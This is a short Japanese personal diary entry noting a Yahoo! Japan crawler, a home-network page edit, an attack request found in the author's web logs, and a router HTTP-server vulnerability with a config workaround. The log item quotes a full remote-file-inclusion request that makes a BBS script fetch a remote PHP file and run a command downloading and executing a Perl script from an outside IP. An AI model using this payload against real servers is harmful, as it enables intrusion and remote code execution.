屑俺日記

☆ Y! のuser-agent

Yahoo! Japanの 独自のクローラもある、とのことである。
URLはログに書き残されていた。

☆ 自宅の

ネットワーク環境のページを加筆。
一部を別ページに分離。
舌をもっと伸ばせ、である。

☆ 今度はmmmか。

// 211.185.193.2から
"GET //bbs/skin/zero_vote/error.php?dir=http://210\
.178.111.65/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20210\
.178.111.65/mmm;perl%20mmm HTTP/1.1"

error.phpの引数に、あらぬところのfbi.gifとか を読み込ませている。
fbi.gifとかいうファイルはphpスクリプトだった。 後は何回か出た、curl(1)でリモートのmmm (これはperlスクリプト)を/tmpにダウンロードし、 実行(する筈。404だったし、試す気になれない)。

☆ ルータの

脆弱性情報がMLに届いた。
httpサーバ(管理用途と見える)の脆弱性により、 XSS等の攻撃が可能かもしれない、でいいのか？

今のところ触る機会もないから、Workaroundを 少し見ただけ。で放置。

> enable
(ry
# config terminal
(config)# no ip http server
(config)# no ip http secure-server
# copy running-config startup-config